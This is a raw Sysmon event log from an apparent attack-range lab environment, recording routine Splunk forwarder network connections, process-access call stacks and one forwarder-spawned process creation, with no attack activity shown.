354300x8000000000000000216454Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:43.663{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51328-false10.0.1.12-8000- 23542300x8000000000000000287580Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:47.507{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A637CBDFA448F28FAF344F114533D930,SHA256=C56920C312692FD6CC701FEFBB479310EB1E92D3AB397C8D8828B501D818CC4E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216485Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:45.398{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51329-false10.0.1.12-8089- 10341000x8000000000000000216484Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:47.878{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-114B-6216-5304-000000003902}696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216483Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:47.878{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216482Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:47.878{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216481Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:47.878{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216480Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:47.878{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216479Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:47.878{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216478Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:47.878{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216477Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:47.878{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216476Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:47.878{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216475Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:47.878{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216474Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:47.878{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-114B-6216-5304-000000003902}696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216473Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:47.878{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-114B-6216-5304-000000003902}696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216472Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:47.879{4F8D34B0-114B-6216-5304-000000003902}696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000216471Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:47.378{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-114B-6216-5204-000000003902}2396C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216470Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:47.378{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216469Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:47.378{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216468Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:47.378{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216467Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:47.378{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216466Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:47.378{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216465Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:47.378{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216464Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:47.378{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216463Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:47.378{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216462Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:47.378{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216461Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:47.378{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-114B-6216-5204-000000003902}2396C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216460Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:47.378{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-114B-6216-5204-000000003902}2396C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 